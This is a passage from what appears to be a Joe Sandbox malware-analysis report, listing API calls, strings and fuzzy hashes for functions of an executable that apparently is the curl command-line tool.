                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                        • String ID:
                                        • API String ID: 3226260525-0
                                        • Opcode ID: bfc406c457bd7cf8f036da816a0f45e8f269149cacf61affe6f0e58ff873b120
                                        • Instruction ID: 220f225ac8996119771630e5d1a630aa7bca900965a9c2abd2fcc2de5d918efc
                                        • Opcode Fuzzy Hash: bfc406c457bd7cf8f036da816a0f45e8f269149cacf61affe6f0e58ff873b120
                                        • Instruction Fuzzy Hash: 79315B37109612AED7295728AC61EFE7BDDCF57360314406DF54197183EF319D4682B1
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2BB8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2C0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Range$Range: bytes=%s
                                        • API String ID: 1294909896-2902172602
                                        • Opcode ID: 10753c1d0dec6b2f69a211a379267a204e0192bf6e110c88dce4753f6d30abc6
                                        • Instruction ID: 1628c1749c712bc1ec664fc64b2c9fd717ea212ecf922a3afae399acdd9a3394
                                        • Opcode Fuzzy Hash: 10753c1d0dec6b2f69a211a379267a204e0192bf6e110c88dce4753f6d30abc6
                                        • Instruction Fuzzy Hash: AF315872B04616BFE32C1B74EC01FFBB391FB45310F11422AFA0893682DB212CA096E1
                                        APIs
                                          • Part of subcall function 000F480B: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D24A8), ref: 000F4820
                                          • Part of subcall function 000F480B: __alldvrm.LIBCMT ref: 000F4839
                                          • Part of subcall function 000F480B: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F4863
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 000F510A
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 000F5118
                                        • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001), ref: 000F5159
                                        • MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 000F5166
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000F5175
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5181
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000F51A1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F51AD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup$CounterFileMovePerformanceQuerySleepUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1781201201-0
                                        • Opcode ID: 08c0ea96eaa877f66a221e465453fa4e58809444ad483fa951f180245a2f863e
                                        • Instruction ID: 9cddda3d5f152e7e251374e4b9787eb8a8f531645152ac601c5021f6ad9bf85d
                                        • Opcode Fuzzy Hash: 08c0ea96eaa877f66a221e465453fa4e58809444ad483fa951f180245a2f863e
                                        • Instruction Fuzzy Hash: CD21F472900A09EF9B15EFB4EC45AEF73EAFF49312B044025FE02EB541DBB0A9415A90
                                        APIs
                                        • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00111113
                                        • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 0011111E
                                        • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 0011112A
                                        • __RTC_Initialize.LIBCMT ref: 00111142
                                        • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,001118B0), ref: 00111157
                                          • Part of subcall function 00111813: InitializeSListHead.KERNEL32(0012F430,00111167), ref: 00111818
                                        • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00027BE0), ref: 00111175
                                        • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00111190
                                        • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011119F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                        • String ID:
                                        • API String ID: 1933938900-0
                                        • Opcode ID: 86373801ee3943ec048a30c11da5a1e8cd4017b8989ee7f0437ab5bbf6aaa095
                                        • Instruction ID: e3002a9a6b52ca6607e9cafa3ab4c7a75c472ea55107a9195266f512f2d8091c
                                        • Opcode Fuzzy Hash: 86373801ee3943ec048a30c11da5a1e8cd4017b8989ee7f0437ab5bbf6aaa095
                                        • Instruction Fuzzy Hash: F301AF1194875638ED1C33F2B903BDEC1555F31394B208871FB04AA183EF6AC4E180BB
                                        APIs
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00112241,001120AB,00111714), ref: 00112258
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00112266
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0011227F
                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00112241,001120AB,00111714), ref: 001122D1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 2f52afcfc1797f1935d8cd8555125658deb5d43ddafef6fa3bffdfce9d591dc9
                                        • Instruction ID: 1fd8ae857682a201a626c080fed65bd75c7697075ce61b44709a206182a75897
                                        • Opcode Fuzzy Hash: 2f52afcfc1797f1935d8cd8555125658deb5d43ddafef6fa3bffdfce9d591dc9
                                        • Instruction Fuzzy Hash: 6001D8365087116D972D26B47C45AEF27A5EB15B70B20033DF410454F2EF714CF2A568
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102223
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010223B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102253
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010226B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102283
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010229B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001022B3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001022CB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001022E3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: bf983a2945b9f0dd28b852c8bf8085e50de33e8259bd2cf4a69afb57afe20268
                                        • Instruction ID: 82bc88cc9f4d23413f6973bb4f9afb66af3af34271d5794dbc8afda243703d18
                                        • Opcode Fuzzy Hash: bf983a2945b9f0dd28b852c8bf8085e50de33e8259bd2cf4a69afb57afe20268
                                        • Instruction Fuzzy Hash: 8651A031504610DFDF298F10D84876937E2FF94325F24C0AAEC944B296DBB4AC92CF9A
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,74F83C50,00000000,000E182F), ref: 000DF671
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF685
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF699
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6AD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6C1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6D5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6E9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF70F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 7fb3a34d4dd920709dc7a7c6315bede887c20ebf44d6b65436b35df1e43f0989
                                        • Instruction ID: 96366f860648ddca05f45f35492224c45fcb9d771ca700c18cd839cb0eea3b20
                                        • Opcode Fuzzy Hash: 7fb3a34d4dd920709dc7a7c6315bede887c20ebf44d6b65436b35df1e43f0989
                                        • Instruction Fuzzy Hash: F0119732614825EB8B191F14FD0845CBBB6FF88661315C06BE45193A71DFA42CA28FE6
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00000000,74F743D0,?,000D1589,?,?,?,?,00000000), ref: 000D1012
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID: I32$I64
                                        • API String ID: 1114863663-3980630743
                                        • Opcode ID: 2cd8194aab79bd05d83a8a4c77f050568bd2826e1dfb8a353458c4ac37a79dc7
                                        • Instruction ID: d29dd032b5e70850b9c08d806de7ce399a5314c1e19f08ee67efcd02cb6e9be9
                                        • Opcode Fuzzy Hash: 2cd8194aab79bd05d83a8a4c77f050568bd2826e1dfb8a353458c4ac37a79dc7
                                        • Instruction Fuzzy Hash: A4F1B4B1A04301BBDB6D8F6CD9A83FCBBE1EF45300F28416FD646D7795DA758A4086A0
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D01D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D033
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$callocmallocrealloc
                                        • String ID:
                                        • API String ID: 4199894680-3916222277
                                        • Opcode ID: 32e42d099d43d48d24c3ada8cabad13b0312c2aed8a064329002622296ebd6b8
                                        • Instruction ID: 2701f8ebcf09c63117f2bbcb0eed4b0bd9c07bde504803a32299f186b52c67c1
                                        • Opcode Fuzzy Hash: 32e42d099d43d48d24c3ada8cabad13b0312c2aed8a064329002622296ebd6b8
                                        • Instruction Fuzzy Hash: 58517A71604A129FC728CF69E644625BBF1FF84320F188629E485C7A90D7B2F891CFD2
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000000,00000001,00000000,?,?,000C199D,00000000,?,?,000C1773), ref: 000C2C7A
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001,?,000C199D,00000000,?,?,000C1773), ref: 000C2C91
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\\?\,00000004), ref: 000C2CAE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 000C2D52
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2D79
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$mallocstrncmpstrncpy
                                        • String ID: \\?\$|<>"?*
                                        • API String ID: 2141947759-3264285191
                                        • Opcode ID: 57543c61c7e69f5b62e119c87d44c51305eb559e7bdb8557616653a1ad690780
                                        • Instruction ID: 3c3b8494aa0e39e4794c2d956cf3ff5b4af4c2f1a6376b6c0a27538ffa68ce96
                                        • Opcode Fuzzy Hash: 57543c61c7e69f5b62e119c87d44c51305eb559e7bdb8557616653a1ad690780
                                        • Instruction Fuzzy Hash: D7513931A047459FEB758B24C894FEE7BE1AF61340F24806DDC439BA92DB748D80C790
                                        APIs
                                        • strspn.API-MS-WIN-CRT-STRING-L1-1-0(00000005,0123456789abcdefABCDEF:.,00000000,00000000,?), ref: 000D5295
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,001228BC,00000002), ref: 000D52C7
                                        • inet_pton.WS2_32(00000017,00000005,?), ref: 000D535F
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000004, /:#?!@,00000000,00000000,?), ref: 000D53D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: inet_ptonstrcspnstrncmpstrspn
                                        • String ID: /:#?!@$0123456789abcdefABCDEF:.
                                        • API String ID: 3548342379-4134865206
                                        • Opcode ID: fb40f58db395c2e7d053a5941a534f6bf23bc707d38c5ccac2c45c88647bfc51
                                        • Instruction ID: a33e6d3879179aa41e80f988b6487ca0c16ccee7e3813413b2bb04cb5a4835a6
                                        • Opcode Fuzzy Hash: fb40f58db395c2e7d053a5941a534f6bf23bc707d38c5ccac2c45c88647bfc51
                                        • Instruction Fuzzy Hash: A4511531904B459FDF24CF68DC407BD7BE5AF56382F24046BD881E7382E7A0AA468770
                                        APIs
                                        • _strrchr.LIBCMT ref: 000FDB47
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDBC4
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDBE8
                                          • Part of subcall function 0010C864: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000FDB17), ref: 0010C885
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDC0E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDC25
                                        Strings
                                        • Wildcard - Parsing started, xrefs: 000FDCA0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$calloc$_strrchr
                                        • String ID: Wildcard - Parsing started
                                        • API String ID: 3895608051-2475583933
                                        • Opcode ID: ff84384e2c6eca7caec2072c7653ad5088b02d2eaa0f9c8ed0c200cdde10c63f
                                        • Instruction ID: 9311c6c4c554fa90d6e07b04cd3472206fece049e8efb918a95e3992ea06a824
                                        • Opcode Fuzzy Hash: ff84384e2c6eca7caec2072c7653ad5088b02d2eaa0f9c8ed0c200cdde10c63f
                                        • Instruction Fuzzy Hash: 6A41B231704A1AEFD7289F64EC447A9BBE6FF44710F10402BD61997B91DBB06C81DB91
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 000C347F
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00116C58), ref: 000C348D
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C35C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcfclosefopen
                                        • String ID: %s$%s$Failed to open %s to write libcurl code!
                                        • API String ID: 4110152555-3591596397
                                        • Opcode ID: 6744e3ae5df159f690bd6da1f9052a8eab0b985d52413476a23408c984ca14b9
                                        • Instruction ID: 62ba26fe0c8fe75896b666a1c821e0e1d48cc8ec51bfd5afc5aa68ab8118fa28
                                        • Opcode Fuzzy Hash: 6744e3ae5df159f690bd6da1f9052a8eab0b985d52413476a23408c984ca14b9
                                        • Instruction Fuzzy Hash: 5E412B71118F01ABD7165B18AC02F9EB3B9AF51314B24802DF91467342D771FFA2C6A5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7A80
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7A9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: o$output file name has no length
                                        • API String ID: 1865132094-237255669
                                        • Opcode ID: 0889391cce9534ff6a2a0cca6dcf05c4eb2f58693fecca9a65ebc29a5d988de3
                                        • Instruction ID: a716ad96103ed0b604ad330a72785612e081dd0103a0ed15200a9eda66d93801
                                        • Opcode Fuzzy Hash: 0889391cce9534ff6a2a0cca6dcf05c4eb2f58693fecca9a65ebc29a5d988de3
                                        • Instruction Fuzzy Hash: C341B675608742DFC3A5CF349844FAEB7E1AF99314F188A1DE4A9C7280DB30DC819B45
                                        APIs
                                        • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 000EB02A
                                        Strings
                                        • necessary data rewind wasn't possible, xrefs: 000EB038
                                        • seek callback returned error %d, xrefs: 000EAFAE
                                        • the ioctl callback returned %d, xrefs: 000EAFFA
                                        • ioctl callback returned error %d, xrefs: 000EB00D
                                        • Cannot rewind mime/post data, xrefs: 000EB048
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fseek
                                        • String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                        • API String ID: 623662203-539828175
                                        • Opcode ID: bf09a7351a4ec8798a9267dcfc9e1af7595cd24c00e90ce05ec94d0640ba5579
                                        • Instruction ID: 7958066c932c4c514634bb3a15ba039a9dee8a93d9e121608dd20459c9b34120
                                        • Opcode Fuzzy Hash: bf09a7351a4ec8798a9267dcfc9e1af7595cd24c00e90ce05ec94d0640ba5579
                                        • Instruction Fuzzy Hash: A7310431701642AFC7385B319CD5AFBB7A6FF41364F040226F82967291DB616C10DAE1
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000CD7AC
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000CD7B7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000CD8B0
                                        Strings
                                        • Enter %s password for user '%s' on URL #%zu:, xrefs: 000CD85B
                                        • Enter %s password for user '%s':, xrefs: 000CD836
                                        • %s:%s, xrefs: 000CD897
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr$free
                                        • String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
                                        • API String ID: 3654317688-2337704101
                                        • Opcode ID: 2476553d3d653c1f7e6946b1cd5120cf3e2b8bf02d605bba276bde25d4d2f331
                                        • Instruction ID: 158e336d781fc4954db3efb758b2d1c8d6d8251e12e916e14c9a89427cf87a11
                                        • Opcode Fuzzy Hash: 2476553d3d653c1f7e6946b1cd5120cf3e2b8bf02d605bba276bde25d4d2f331
                                        • Instruction Fuzzy Hash: 50319371E0121AAEEB629B64DC41FD9BBF5AF18300F1040FAE548A7143DB719A94CF50
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000C9CB9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000C9CCD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9D63
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C9D74
                                        Strings
                                        • out of memory, xrefs: 000C9CDC
                                        • Got more output options than URLs, xrefs: 000C9D9F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
